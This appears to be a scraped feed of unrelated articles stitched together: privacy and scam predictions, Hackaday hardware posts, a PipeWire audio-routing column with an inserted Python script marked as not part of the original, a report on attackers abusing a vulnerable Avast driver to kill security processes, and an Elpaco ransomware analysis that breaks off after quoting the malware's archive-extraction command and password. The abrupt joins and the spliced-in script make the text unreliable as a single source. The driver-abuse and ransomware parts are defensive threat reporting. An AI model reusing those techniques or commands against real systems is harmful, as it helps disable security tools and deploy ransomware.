Just as predicted, the rise of voice deepfakes continued in 2024, fueling scams like vishing (voice phishing). A notable example is the proliferation of “fake kidnapping” scams, where attackers use voice imitation technology to impersonate real individuals and extort money from their families. The availability of open-source voice generation models expanded significantly, making these tools more accessible and lowering the technological threshold for malicious actors. The challenge of combating deepfakes extends beyond advances in tech and includes the need to raise public awareness and ensure the seamless integration of detection tools into everyday life.
Lastly, cybercriminals capitalized on the anticipation surrounding major film and game releases in 2024, which aligned with our earlier predictions. The release of “Joker 2” was accompanied by scams like phishing websites and fake streaming links, that aimed to deceive eager fans. Although “Grand Theft Auto VI” (GTA VI) is scheduled for release in 2025, scammers have already started to exploit its popularity by creating fake beta versions and unauthorized mobile releases to trick users into downloading malware or submitting personal information.
Overview of 2024 privacy predictions
The privacy landscape in 2024 was shaped by significant technological advances and evolving societal concerns, aligning with many of our predictions but leaving some areas underdeveloped.
Biometric data gained recognition as a critical aspect of privacy protection, with the European Union adopting the Artificial Intelligence (AI) Act to address privacy concerns associated with facial recognition and other biometric technologies. This marked a notable step towards expanding the concept of private data beyond traditional means of identification. However, while the EU led these efforts, global consensus and comprehensive implementation of similar standards remain ongoing challenges, rendering the anticipated trend of stricter regulation of biometric data usage only partially fulfilled.
Predicted privacy debates surrounding AI-enabled wearables, such as Humane’s AI Pin, did not gain much traction, as these devices struggled to make significant advancements in 2024. As a result, discussions surrounding these technologies often merged with those about AR and VR devices, which saw more tangible development. Devices like Apple Vision Pro and Meta’s Ray-Ban smart glasses highlighted similar concerns around data collection, biometric privacy, environmental mapping and bystanders’ consent. While these advancements brought privacy challenges to the forefront, the lack of robust regulatory frameworks left these predictions only partially realized. The immersive and pervasive nature of AR/VR technology underscores the urgency of establishing concrete regulatory measures to address these evolving concerns.
In 2024, the prediction that leaked passwords would become less of a concern saw partial realization. The increased adoption of passwordless authentication, supported by passkeys and biometric logins from major tech companies like Google, Microsoft and Apple, reduced the reliance on traditional passwords and mitigated the impact of credential leaks. However, the transition remains incomplete, with gaps in adoption leaving room for continued exploitation.
Assistant bots showed promise in enhancing privacy, particularly in mitigating phishing risks through call transcription and incoming caller screening, as predicted. However, the rise of sophisticated scams targeting bot vulnerabilities underscored the dual role of these technologies, showcasing both their potential and the need for stronger safeguards.
Overall, 2024 demonstrated progress in addressing critical privacy concerns while highlighting the need for continued advancement, global collaboration and comprehensive regulatory efforts to fully realize the potential of emerging technology in safeguarding privacy.
Consumer and privacy predictions for 2025
AI becomes an everyday reality
In 2025, artificial intelligence (AI) will solidify its role as a core element of daily life, transitioning from an innovative tool to a mundane utility. The rapid adoption of AI-driven technology across various domains — from search engines to creative tasks — has already reshaped how people work, learn and communicate. Major platforms like Google and Bing have integrated AI into search results, while users increasingly rely on chatbots for everything from answering questions and editing media to learning languages and simplifying workflows.
This trend is set to expand further with the anticipated release of advanced AI features in key operating systems like iOS and Android, marking a new phase in AI accessibility. As these capabilities roll out, AI will influence not only personal convenience but also broader industries. In academia, for instance, AI has accelerated research processes, and its contributions may reach new heights, as highlighted by the potential for groundbreaking achievements like the Nobel Prize awarded to the cofounder and scientist behind the AI initiative DeepMind.
However, alongside this normalization, challenges remain. AI’s ability to produce personalized deepfakes continues to evolve, raising ethical and privacy concerns in the absence of robust detection tools. As AI systems increasingly interact with and shape the physical world, the need for safeguards and accountability will grow. By 2025, AI’s ubiquity will transform it from a novelty into an indispensable part of modern life, with both opportunities and risks becoming more pronounced.
Fraudsters to exploit high-profile entertainment releases in 2025
In 2025, cybercriminals are expected to capitalize on the excitement surrounding major gaming, console and film releases. The launch of highly anticipated games like Mafia: The Old Country, Civilization VII and Death Stranding 2 will likely be accompanied by scams involving fake pre-orders and counterfeit digital keys. Similarly, rumors about the release of Nintendo’s next-generation console may fuel scams tied to pre-orders, early sales and fake hacking tools, some of which could deliver malware disguised as rootkits.
On the cinematic front, anticipated sequels and remakes like Superman, Jurassic World Rebirth, Captain America: Brave New World, Return to Silent Hill, and Tron: Ares will provide scammers with ample opportunity. Fraudulent campaigns may target fan forums and social media platforms by promoting fake early screenings, counterfeit merchandise and phishing emails. As the hype around these premieres intensifies, so will the sophistication and scale of cybercriminal activity seeking to exploit eager fans and consumers.
Proliferating subscription services to fuel fraud risks
As the global economy increasingly shifts towards subscription-based models, a significant uptick in fraud related to fake subscription offerings is anticipated. Cybercriminals are expected to exploit the growing shift in habits regarding subscriptions and reliance on these by creating counterfeit services that mimic legitimate ones. These fraudulent platforms aim to deceive users into providing personal and financial information, leading to identity theft and financial loss.
Moreover, with the proliferation of subscription services, some users may turn to unofficial resources to access content at reduced prices or for free. These non-official channels often lack proper security and may serve as hotspots for malware distribution, phishing attacks and other cyberthreats. Engaging with these platforms not only undermines legitimate businesses’ interests but also exposes users to heightened risks of fraud and data breaches.
Prohibition of social media for children may lead to broader user restrictions
Australia is considering legislation to ban children under 16 from using social media platforms like Facebook, Instagram, TikTok and X (formerly Twitter). The success of this measure hinges on its technical implementation, particularly in establishing reliable and effective age verification systems. If these challenges are successfully resolved, this legislation could serve as a model for similar restrictions globally. Moreover, successful implementation of a stricter approach might create a precedent for projecting restrictive measures onto other user groups, potentially reshaping international norms for regulating online platform access and use.
While unrelated to Australia’s initiative, content sharing platforms like Instagram are independently exploring advanced solutions to address age-related access issues. Instagram, for example, plans to deploy artificial intelligence to detect users misrepresenting their age, demonstrating how technology can enhance compliance with age-based policies. These innovations highlight the potential for scalable enforcement solutions, even as they face significant hurdles in ensuring accuracy and fairness.
Political polarization to fuel cyberbullying
In 2025, the increasing political divides affecting countries worldwide are expected to fuel a rise in cyberbullying, exacerbated by the global reach of social media platforms. Economic disparities, social movements and geopolitical conflicts have heightened tensions across Europe, Asia, Africa and the Americas. Social media platforms amplify these divides through algorithms that promote echo chambers and inflammatory content, creating an environment ripe for targeted harassment. Emerging AI tools, such as those used to create deepfakes or doctored posts, further enable malicious actors to escalate harassment. Although there are measures taken by various social media platforms to protect the online community from abuse, offensive content is hard to distinguish comprehensively, leaving users exposed to cyberbullying.
This trend will lead to an increase in the frequency of targeted attacks, doxing and coordinated cyberbullying campaigns, often crossing national boundaries. Individuals may face harassment not only from domestic adversaries but also from users abroad, making cyberbullying a transnational issue.
New regulations to expand user ownership of their data
In 2025, privacy regulations are set to hand users more control over their personal data than ever before. New laws may enable individuals to monetize their data, turning it from a corporate commodity into a personal asset. Expanded portability rights could make it easier to move data across platforms, encouraging competition and giving users the freedom to switch services without losing their digital history. Simplified consent models and enhanced rights to correct or delete data will further empower users to manage their online presence.
Globally, privacy frameworks like California’s CPRA and the EU’s GDPR are inspiring similar reforms in regions such as Asia and across U.S. states. Innovations like decentralized data storage may also emerge, giving users direct control over their data. By the end of 2025, the balance of power in the digital ecosystem may shift decisively toward individuals.
Getting Started In Laser Cutting
If you were to walk into most of the world’s hackerspaces, it’s likely that the most frequent big-ticket tool you’ll find after a 3D printer is a laser cutter. A few years ago that would inevitably have been one of the ubiquitous blue Chinese-made K40 machines, but here in 2024 it’s become common to see something far more sophisticated. For all that, many of us are still laser cutter noobs, and for us [Dominic Morrow] gave a talk at last summer’s EMF Camp in the UK entitled “Getting Started In Laser Cutting“. [Dominic] is a long-term laser cutting specialist who now works for Lightburn, so he’s ideally placed to deliver this subject.
It’s fair to say that this is an overview in the time available for a hacker camp talk rather than an in-depth piece, so he takes the approach of addressing people’s misconceptions and concerns about cutters. Perhaps the most important one he addresses is the exhaust, something we’ve seen a few in our community neglect in favor of excessive attention to laser cooling or other factors. An interesting one for us, though, was his discussion of the cheaper diode lasers; having some insight into this end of the market is valuable when you have no idea which way to go.
We’re sorry to have missed this one in the real world, perhaps because of the allure of junk.
youtube.com/embed/o_i9Mv3Mby4?…
Massive Mural from Thermal Receipt Paper
Turning trash into art is something we undoubtedly all admire. [Davis DeWitt] did just that with a massive mural made entirely from discarded receipt paper. [Davis] got lucky while doing some light dumpster diving, where he stumbled upon a box of thermal paper rolls. He saw the potential in them and, armed with engineering skills and a rental-friendly approach, set out to create something original.
The journey began with a simple test: how long can a receipt be printed, continuously? With a maximum length of 10.5 feet per print, [Davis] designed an image for the mural using vector files to maintain a high resolution. The scale of the project was a challenge in itself, taking over 13 hours to render a single image at the necessary resolution for a mural of this size. The final piece is 30 feet (9.144 meters) wide and 11 feet (3.3528 meters) tall – a pretty good conversation piece in anyone’s room – or shop, in [Davis]’ case.
Once the design was ready, the image was sliced into strips that matched the width of the receipt paper. Printing over 1,000 feet of paper wasn’t without its issues, so [Davis] designed a custom spool system to undo the curling of the receipts. Hanging the mural involved 3D-printed brackets and binder clips, allowing the strips to hang freely with a kinetic effect.
Though the thermal paper will fade over time, the beauty of this project lies in its adaptability—just reprint any faded strips. Want to see how it all came together? Watch the full process here.
youtube.com/embed/dx0aSfPZonM?…
Your Undocumented Project May Also Baffle People Someday
What’s life without a little mystery? There’s one less rolling around after historians finally identified a donated mystery machine that had been in storage for years.
Feeding dough through this machine may have been faster, but probably not safer.
The main pieces of the machine are about a century old and any staff who may have known more about the undocumented device were no longer around to ask. The historical society finally posted pictures and asked for any insights, which eventually led to solving the mystery.
The machine is in all likelihood a beaten biscuit maker, which was a type of dense baked good popular in the American south. Making them called for a long and labor-intensive process of pounding and working the dough, and the society says this machine was likely created by a fellow trying to help his aunt streamline her business, offloading the labor of working the dough to a machine.
The machine had no branding of any sort and lacked any identifying marks. Its purpose was doubtfully obvious at the time, but no records remained and quite possibly none existed in the first place. Sound familiar? Perhaps someday our own undocumented projects and prototypes will mystify people. It’s certainly happened in the case of mysterious Roman dodecahedrons, which remain a head-scratching mystery.
A Robot Meant for Humans
Although humanity was hoping for a more optimistic robotic future in the post-war era, with media reflecting that sentiment like The Jetsons or Lost in Space, we seem to have shifted our collective consciousness (for good reasons) to a more Black Mirror/Terminator future as real-world companies like Boston Dynamics are actually building these styles of machines instead of helpful Rosies. But this future isn’t guaranteed, and a PhD researcher is hoping to claim back a more hopeful outlook with a robot called Blossom which is specifically built to investigate how humans interact with robots.
As a platform, this robot is not too complex, consisting of an accessible frame that can be laser-cut from wood with only a few moving parts controlled by servos. The robot is not too large, either, and can be set on a desk to be used as a telepresence robot. But Blossom’s creator [Michael] wanted this to help understand how humans interact with robots, so the latest version is outfitted not only with a large language model with text-to-speech capabilities, but also with a compelling backstory, lore, and a voice derived from Animal Crossing that’s neither human nor recognizably synthetic robot, all in an effort to make the device more approachable.
To that end, [Michael] set the robot up at a Maker Faire to see what sorts of interactions Blossom would have with passers by, and while most were interested in the web-based control system for the robot a few others came by and had conversations with it. It’s certainly an interesting project and reminds us a bit of this other piece of research from MIT that looked at how humans and robots can work productively alongside one another.
A Laser with Mirrors makes a CRT-like Display
[bitluni]’s laser-based display pretending to be an old-school vector CRT.
Phosphor-based displays like CRTs rely on the phosphor to emit light for a set amount of time after being activated, allowing them to display a seemingly persistent image with one drawing beam per color. Translated to UV-sensitive PLA filament, this means that you can totally use a printed sheet of this material in combination with a 405 nm laser diode to create a display that doesn’t look dissimilar to an early CRT. This is exactly what [bitluni] did in a recent video, meshing together said laser diode, UV-sensitive PLA, stepper motors and two mirrors with an Arduino-based controller to create a rather interesting vector display.
In the video, [bitluni] goes over the development steps, including a range of improvements like being able to turn off the laser when moving between the end of a line and the beginning of a new one. While the Arduino Nano board does the driving of the stepper motor controllers, an ESP32 provides the drawing instructions. The STL and other project files including Nano & ESP32 firmware can be found on the GitHub project page.
While far from being a practical display with a single-digit Hz refresh rate, it does provide an interesting demonstration of these types of persistence of vision based displays, and without the use of exotic MEMS mirror modules or the like.
youtube.com/embed/9qPc_I1V6go?…
Alternatives Don’t Need to be Bashed
By default, bash is the most popular command language simply because it’s included in most *nix operating systems. Additionally, people don’t tend to spend a lot of time thinking about whatever their computer uses for scripting as they might for other pieces of software like a word processor or browser. If you are so inclined to take a closer look at this tool that’s often taken for granted, there are a number of alternatives to bash and [monzool] wanted to investigate them closely.
Unlike other similar documentation that [monzool] has come across where the writers didn’t actually use the scripting languages being investigated, [monzool] is planning to use each of these and accomplish specific objectives. This will allow them to get a feel for the languages and whether or not they are acceptable alternatives for bash. Moving through directories, passing commands back and forth, manipulating strings, searching for files, and manipulating the terminal display settings are all included in this task list. A few languages are tossed out before initial testing even begins for not meeting certain specific requirements. One example is not being particularly useful in [monzool]’s preferred embedded environments, but even so there are enough bash alternatives to test out ten separate languages.
Unfortunately, at the end of the day none of the ten selected would make a true replacement for bash, at least for [monzool]’s use case, but there were a few standouts nonetheless. Nutshell was interesting for being a more modern, advanced system and [monzool] found Janet to be a fun and interesting project but had limitations with cross-compiling. All in all though this seemed to be an enjoyable experience that we’d recommend if you actually want to get into the weeds on what scripting languages are actually capable of. Another interesting one we featured a while back attempts to perform as a shell and a programming language simultaneously.
Linux Fu: Audio Network Pipes
Life was simpler when everything your computer did was text-based. It is easy enough to shove data into one end of a pipe and take it out of the other. Sure, if the pipe extends across the network, you might have to call it a socket and take some special care. But how do you pipe all the data we care about these days? In particular, I found I wanted to transport audio from the output of one program to the input of another. Like most things in Linux, there are many ways you can get this done and — like most things in Linux — only some of those ways will work depending on your setup.
Why?
There are many reasons you might want to take an audio output and process it through a program that expects audio input. In my case, it was ham radio software. I’ve been working on making it possible to operate my station remotely. If all you want to do is talk, it is easy to find software that will connect you over the network.
However, if you want to do digital modes like PSK31, RTTY, or FT8, you may have a problem. The software to handle those modes all expect audio from a soundcard. They also want to send audio to a soundcard. But, in this case, the data is coming from a program.
Of course, one answer is to remote desktop into the computer directly connected to the radio. However, most remote desktop solutions aren’t made for high-fidelity and low-latency audio. Plus, it is nice to have apps running directly on your computer.
I’ll talk about how I’ve remoted my station in a future post, but for right now, just assume we want to get a program’s audio output into another program’s audio input.
Sound System Overview
Someone once said, “The nice thing about standards is there are so many of them.” This is true for Linux sound, too. The most common way to access a soundcard is via ALSA, also known as Advanced Linux Sound Architecture. There are other methods, but this is somewhat the lowest common denominator on most modern systems.
However, most modern systems add one or more layers so you can do things like easily redirect sound from a speaker to a headphone, for example. Or ship audio over the network.
The most common layer over ALSA is PulseAudio, and for many years, it was the most common standard. These days, you see many distros moving to PipeWire.
PipeWire is newer and has a lot of features but perhaps the best one is that it is easy to set it up to look like PulseAudio. So software that understands PipeWire can use it. Programs that don’t understand it can pretend it is PulseAudio.
There are other systems, too, and they all interoperate in some way. While OSS is not as common as it once was, JACK is still found in certain applications. Many choices!
One Way
There are many ways you can accomplish what I was after. Since I am running PipeWire, I elected to use qpwgraph, which is a GUI that shows you all the sound devices on the system and lets you drag lines between them.
It is super powerful but also super cranky. As things change, it tends to want to redraw the “graph,” and it often does it in a strange and ugly way. If you name a block to help you remember what it is and then disconnect it, the name usually goes back to the default. But these are small problems, and you can work around them.
In theory, you should be able to just grab the output and “wire” it to the other program’s input. In fact, that works, but there is one small problem. Both PipeWire and PulseAudio will show when a program is making sound, and then, when it stops, the source vanishes.
This makes it very hard to set up what I wanted. I wound up using a loopback device so that there was something permanent for both the receiver and the transient sending device to connect to.
Here’s the graph I wound up with:
A partial display of the PipeWire configuration
I omitted some of the devices and streams that didn’t matter, so it looks pretty simple. The box near the bottom right represents my main speakers. Note that the radio speaker device (far left) has outputs to the speaker and to the JTDX in box.
This lets me hear the audio from the radio and allows JTDX to decode the FT8 traffic. Sending is a little more complicated.
The radio-in boxes are the loopback device. You can see it hooked to the JTDX out box because when I took the screenshot, I was transmitting. If I were not transmitting, the out box would vanish, and only the pipe would be there.
Everything that goes to the pipe’s input also shows up as the pipe’s output and that’s connected directly to the radio input. I left that box marked with the default name instead of renaming it so you can see why it is worth renaming these boxes! If you hover over the box, you’ll see the full name which does have the application name in it.
That means JTDX has to be set to listen and send to the streams in question. The radio also has to be set to the correct input and output. Usually, setting them to Pulse will work, although you might have better luck with the actual pipe or sink/source name.
In order to make this work, though, I had to create the loopback device:
pw-loopback -n radio-in -m '[FL FR]' --capture-props='[media.class=Audio/Sink]' --playback-props='[media.class=Audio/Source]' &
This creates the device as a sink with stereo channels that connect to nothing by default. Sometimes, I only connect the left channels since that’s all I need, but you may need something different.
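The advice above to use the actual sink/source name rather than "Pulse" raises the question of how to find that name without hovering over boxes in qpwgraph. The following script is an added example, not part of the original column: it parses the JSON that `pw-dump` prints (a list of objects; for Node objects the properties sit under `info.props`, which is an assumption about pw-dump's layout) and groups the Audio/Sink and Audio/Source nodes, so the loopback halves can be handed to JTDX or the radio software by name. When `pw-dump` is not installed it falls back to a constructed sample; the node names in that sample are illustrative, not copied from a real system.

```python
"""Find the real PipeWire node names to hand to an application.

Added example, not part of the original column. Reads pw-dump's JSON
(assumed layout: a list of objects, Node properties under info.props),
groups Audio/Sink and Audio/Source nodes, and locates the two halves of a
loopback created with "pw-loopback -n <name>".
"""
import json
import shutil
import subprocess

# Constructed sample in the shape of a pw-dump excerpt. The node names for the
# "radio-in" loopback are illustrative, not copied from a real system.
SAMPLE_PW_DUMP = json.dumps([
    {"id": 30, "type": "PipeWire:Interface:Node",
     "info": {"props": {"node.name": "input.radio-in",
                        "media.class": "Audio/Sink"}}},
    {"id": 31, "type": "PipeWire:Interface:Node",
     "info": {"props": {"node.name": "output.radio-in",
                        "media.class": "Audio/Source"}}},
    {"id": 45, "type": "PipeWire:Interface:Node",
     "info": {"props": {"node.name": "alsa_output.pci-0000_00_1f.3.analog-stereo",
                        "media.class": "Audio/Sink"}}},
    # A transient application stream: not a Sink or Source, which is why it
    # disappears from the graph as soon as the program stops playing.
    {"id": 60, "type": "PipeWire:Interface:Node",
     "info": {"props": {"node.name": "jtdx", "application.name": "jtdx",
                        "media.class": "Stream/Output/Audio"}}},
    # Ports and other object types are skipped by the parser.
    {"id": 61, "type": "PipeWire:Interface:Port",
     "info": {"props": {"port.name": "playback_FL"}}},
])


def nodes_by_class(dump_json, wanted=("Audio/Sink", "Audio/Source")):
    """Map each wanted media.class to the node.name values that carry it."""
    found = {cls: [] for cls in wanted}
    for obj in json.loads(dump_json):
        if obj.get("type") != "PipeWire:Interface:Node":
            continue
        props = obj.get("info", {}).get("props", {})
        cls = props.get("media.class")
        if cls in found and "node.name" in props:
            found[cls].append(props["node.name"])
    return found


def loopback_endpoints(dump_json, name):
    """Return ([sink names], [source names]) whose node.name contains `name`,
    i.e. the two halves of a loopback created with -n <name>."""
    by_class = nodes_by_class(dump_json)
    sinks = [n for n in by_class["Audio/Sink"] if name in n]
    sources = [n for n in by_class["Audio/Source"] if name in n]
    return sinks, sources


def load_dump():
    """Use the live pw-dump output when available, else the sample."""
    if shutil.which("pw-dump"):
        return subprocess.run(["pw-dump"], capture_output=True,
                              text=True, check=True).stdout
    return SAMPLE_PW_DUMP


if __name__ == "__main__":
    dump = load_dump()
    for cls, names in nodes_by_class(dump).items():
        print(cls)
        for n in names:
            print("   ", n)
    print("radio-in loopback:", loopback_endpoints(dump, "radio-in"))
```

The node names this prints are the same ones that prefix the port names listed by `pw-link -o` and `pw-link -i`, so they are also what you need if you wire things up with pw-link instead of the GUI.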
Other Ways
There are many ways to accomplish this, including using the pw-link utility or setting up special configurations. The PipeWire documentation has a page that covers at least most of the scenarios.
You can also create this kind of virtual device and wiring with PulseAudio. If you need to do that, investigate the pactl command and use it to load the module-loopback module.
It is even possible to use the snd-aloop module to create loopback devices. However, PipeWire seems to be the future, so unless you are on an older system, it is probably better to stick to that method.
Sound Off!
What’s your favorite way to route audio? Why do you do it? What will you do with it? I’ll have a post detailing how this works to allow remote access to a ham transceiver, although this is just a part of the equation. It would be easy enough to use something like this and socat to stream audio around the network in fun ways.
We’ve talked about PipeWire for audio and video before. Of course, connecting blocks for audio processing makes us want to do more GNU Radio.
BYOVD increasingly used to disable AV/EDR. Avast, McAfee, Sophos in the crosshairs
Trellix specialists have detected a new malicious campaign that exploits the old, vulnerable Avast anti-rootkit driver (Avast Anti-Rootkit). The attackers use BYOVD (Bring Your Own Vulnerable Driver) tactics to evade detection and disable security components.
The malware, which installs the vulnerable driver on the victims’ systems, is a variant of the AV Killer malware. It ships with a hardcoded list containing the names of 142 security processes associated with solutions from various vendors.
Because the old Avast driver can run at kernel level, it gives the attackers access to critical parts of the operating system and also allows the malware to terminate processes.
According to Trellix experts, part of the malware (namely the file kill-floor.exe) places the vulnerable driver ntfs.bin in the default Windows user folder. The malware then creates the aswArPot.sys service using Service Control (sc.exe) and registers the driver.
The malware then checks a list of 142 processes associated with various security tools and looks for matches in several snapshots of the processes active on the system. If a match is found, the malware creates a handle to attach to the installed Avast driver and uses the DeviceIoControl API to issue the IOCTL commands needed to terminate the process.
The malware attacks the processes of many security solutions, including products from McAfee, Symantec (Broadcom), Sophos, Avast, Trend Micro, Microsoft Defender, SentinelOne, ESET and BlackBerry. By disabling them, the malware is able to carry out malicious actions freely, without generating alerts or fearing being blocked.
It is worth noting that this particular Avast driver has been exploited by attackers before. For example, in early 2022 cybersecurity researchers reported that AvosLocker used similar tactics. And in 2021 the Cuba ransomware exploited the Avast anti-rootkit driver.
Around the same time, SentinelLabs experts discovered two vulnerabilities (CVE-2022-26522 and CVE-2022-26523) that had existed since 2016. These bugs allowed attackers to escalate their privileges on the target system and escape the sandbox. As a result, Avast developers were informed of these problems and the company fixed the bugs in December 2021.
The article BYOVD increasingly used to disable AV/EDR. Avast, McAfee, Sophos in the crosshairs comes from il blog della sicurezza informatica.
Recreating Unobtainium Weather Station Sensors
Imagine you own a weather station. Then imagine that after some years have passed, you’ve had to replace one of the sensors multiple times. Your new problem is that the sensor is no longer available. What does a hacker like [Luca] do? Build a custom solution, of course!
[Luca]’s work concerns the La Crosse WS-9257F-IT weather station, and the repeat failures of the TX44DTH-IT external sensor. Thankfully, [Luca] found that the weather station’s communication protocol had been thoroughly reverse-engineered by [Fred], among others. He then set about creating a bridge to take humidity and temperature data from Zigbee sensors hooked up to his Home Assistant hub, and send it to the La Crosse weather station. This was achieved with the aid of a SX1276 LoRa module on a TTGO LoRa board. Details are on GitHub for the curious.
[Luca] didn’t just work on the Home Assistant integration, though. A standalone sensor was also developed, based on the Xiao SAMD21 microcontroller board and a BME280 temperature, pressure, and humidity sensor. It too can integrate with the La Crosse weather station, and proved useful for one of [Luca]’s friends who was in the same boat.
Ultimately, it sucks when a manufacturer no longer supports hardware that you love and use every day. However, the hacking community has a way of working around such trifling limitations. It’s something to be proud of—as the corporate world leaves hardware behind, the hackers pick up the slack!
Dark web, the great marketplace of illegal trafficking
From drug trafficking to contract killings, the dark web is the dark realm of the possible. Why investigations are so difficult.
The post Dark web, la grande piazza dei traffici illegali appeared first on InsideOver.
Humans Can Learn Echolocation Too
Most of us associate echolocation with bats. These amazing creatures are able to chirp at frequencies beyond the limit of our hearing, and they use the reflected sound to map the world around them. It’s the perfect technology for navigating pitch-dark cave systems, so it’s understandable why evolution drove down this innovative path.
Humans, on the other hand, have far more limited hearing, and we’re not great chirpers, either. And yet, it turns out we can learn this remarkable skill, too. In fact, research suggests it’s far more achievable than you might think—for the sighted and vision impaired alike!
Bounce That Sound
Bats are the most famous biological users of echolocation. Credit: Petteri Aimonen
Before we talk about humans using echolocation, let’s examine how the pros do it. Bats are nature’s acoustic engineers, emitting rapid-fire ultrasonic pulses from their larynx that can range from 11 kHz to over 200 kHz. Much of that range is far beyond human hearing, which tops out at under 20 kHz. As these sound waves bounce off objects in their environment, the bat’s specialized ultrasonic-capable ears capture the returning echoes. Their brain then processes these echoes in real-time, comparing the outgoing and incoming signals to construct a detailed 3D map of their surroundings. The differences in echo timing tell them how far away objects are, while variations in frequency and amplitude reveal information about size, texture, and even movement. Bats will vary between constant-frequency chirps and frequency-modulated tones depending on where they’re flying and what they’re trying to achieve, such as navigating a dark cavern or chasing prey. This biological sonar is so precise that bats can use it to track tiny insects while flying at speed.
Humans can’t naturally produce sounds in the ultrasonic frequency range. Nor could we hear them if we did. That doesn’t mean we can’t echolocate, though—it just means we don’t have quite the same level of equipment as the average bat. Instead, humans can achieve relatively basic echolocation using simple tongue clicks. In fact, a research paper from 2021 outlined that skills in this area can be developed with as little as a 10-week training program. Over this period, researchers successfully taught echolocation to both sighted and blind participants using a combination of practical exercises and virtual training. A group of 14 sighted and 12 blind participants took part, with the former using blindfolds to negate their vision.
The aim of the research was to investigate click-based echolocation in humans. When a person makes a sharp click with their tongue, they’re essentially launching a sonic probe into their environment. As these sound waves radiate outward, they reflect off surfaces and return to the ears with subtle changes. A flat wall creates a different echo signature than a rounded pole, while soft materials absorb more sound than hard surfaces. The timing between click and echo precisely encodes distance, while differences between the echoes reaching each ear allows for direction finding.
The orientation task involved asking participants to use mouth clicks to determine the way a rectangular object was oriented in front of them. Credit: research paper
The size discrimination task asked participants to determine which disc was bigger solely using echolocation. Credit: research paper
The training regime consisted of a variety of simple tasks. The researchers aimed to train participants on size discrimination, with participants facing two foam board disks mounted on metal poles. They had to effectively determine which foam disc was larger using only their mouth clicks and their hearing. The program also included an orientation challenge, which used a single rectangular board that could be rotated to different angles. The participants had to again use clicks and their hearing to determine the orientation of the board. These basic tools allowed participants to develop increasingly refined echo-sensing abilities in a controlled environment.
Perhaps the most intriguing part of the training involved a navigation task in a virtually simulated maze. Researchers first created special binaural recordings of a mannequin moving through a real-world maze, making clicks as it went. They then created virtual mazes that participants could navigate using keyboard controls. As they navigated through the virtual maze, without vision, the participants would hear the relevant echo signature recorded in the real maze. The idea was to allow participants to build mental maps of virtual spaces using only acoustic information. This provided a safe, controlled environment for developing advanced navigation skills before applying them in the real world. Participants also attempted using echolocation to navigate in the real world, navigating freely with experimenters on hand to guide them if needed.
Participants were trained to navigate a virtual maze using audio cues only. Credit: research paper
The most surprising finding wasn’t that people could learn echolocation – it was how accessible the skill proved to be. Previous assumptions about age and visual status being major factors in learning echolocation turned out to be largely unfounded. While younger participants showed some advantages in the computer-based exercises, the core skill of practical echolocation was accessible to all participants. After 10 weeks of training, participants were able to correctly answer the size discrimination task over 75% of the time, and at increased range compared to when they began. Orientation discrimination also improved greatly over the test period to a success rate over 60% for the cohort. Virtual maze completion times also dropped by over 50%.
Over time, participants improved in all tasks—particularly the size discrimination task, as seen in the results on this graph. The difficulty level of the tasks was also scaled over time, presenting greater challenge as participants improved their echolocation skills. Credit: research paper
The study also involved a follow-up three months later with the blind members of the cohort. Participants credited the training with improving their spatial awareness, and some noted they had begun to use the technique to find doors or exits, or to make their way through strange places.
What’s particularly fascinating is how this challenges our understanding of basic human sensory capabilities. Echolocation doesn’t involve adding new sensors or augmenting existing ones—it’s just about training the brain to extract more information from signals it already receives. It’s a reminder that human perception is far more plastic than we often assume.
The researchers suggest that echolocation training should be integrated into standard mobility training for visually impaired individuals. Given the relatively short training period needed to develop functional echo-sensing abilities, it’s hard to argue against its inclusion. We might be standing at the threshold of a broader acceptance of human echolocation, not as an exotic capability, but as a practical skill that anyone can learn.
The Junk Machine Prints Corrupted Advertising On Demand
[ClownVamp]’s art project The Junk Machine is an interactive and eye-catching machine that, on demand, prints out an equally eye-catching and unique yet completely meaningless (one may even say corrupted) AI-generated advertisement for nothing in particular.
The machine is an artistic statement on how powerful software tools that have genuine promise and usefulness to creative types are finding their way into marketers’ hands, and resulting in a deluge of, well, junk. This machine simplifies and magnifies that in a physical way.
We can’t help but think that The Junk Machine is in a way highlighting Sturgeon’s Law (paraphrased as ‘ninety percent of everything is crud’) which happens to be particularly applicable to the current AI landscape. In short, the ease of use of these tools means that crud is also being effortlessly generated at an unprecedented scale, swamping any positive elements.
As for the hardware and software, we’re very interested in what’s inside. Unfortunately there’s no deep technical details, but the broad strokes are that The Junk Machine uses an embedded NVIDIA Jetson loaded up with Stable Diffusion’s SDXL Turbo, an open source AI image generator that can be installed and run locally. When and if a user mashes a large red button, the machine generates a piece of AI junk mail in real time without any need for a network connection of any kind, and prints it from an embedded printer.
Watch it in action in the video embedded below, just under the page break. There are a few more different photos on [ClownVamp]’s X account.
cdn.transientlabs.xyz/tlx/junk…
Analysis of Elpaco: a Mimic variant
Introduction
In a recent incident response case, we dealt with a variant of the Mimic ransomware with some interesting customization features. The attackers were able to connect via RDP to the victim’s server after a successful brute force attack and then launch the ransomware. After that, the adversary was able to elevate their privileges by exploiting the CVE-2020-1472 vulnerability (Zerologon).
The identified variant abuses the Everything library and provides an easy-to-use GUI for the attacker to customize the operations performed by the malware. It also has features for disabling security mechanisms and running system commands.
This ransomware variant is named “Elpaco” and appends an extension of the same name to the files it encrypts. In this post, we provide details about Elpaco beyond those already shared, as well as the tactics, techniques and procedures (TTPs) employed by the attackers.
Analysis
First look at the sample
Our analysis started with a basic inspection of the sample. First, we verified its properties, such as the file type, strings and capabilities, as shown in the images below.
Interestingly enough, the malware used a 7-Zip installer mechanism, so it was classified as packed by most malware analysis tools and raised suspicions with detection tools.
We inspected the file as a ZIP and found that the sample abused the Everything library, a legitimate filename search engine that provides fast searching and real-time updates by indexing files in Windows systems.
The artifact abused this library in similar ways to the Mimic ransomware discovered earlier by TrendMicro: it contained legitimate Everything applications (Everything32.dll and Everything.exe) and a password-protected archive with malicious payloads, named Everything64.dll. The remaining file inside the archive was a legitimate 7-Zip utility for extracting the malicious archive contents. The Mimic ransomware searches for specific files using Everything APIs, encrypts user data, demands ransom payments, and exhibits sophisticated features like multi-threaded encryption to speed up the attack. Mimic also avoids detection by obfuscating its code, which makes it harder for security tools to detect and block the attack.
By analyzing Elpaco strings, we were able to identify the command used to extract the Everything64.dll file, including its password.
2e434 RunProgram="hidcon:7za.exe x -y -p7183204373585782 Everything64.dll"
7-Zip extraction command
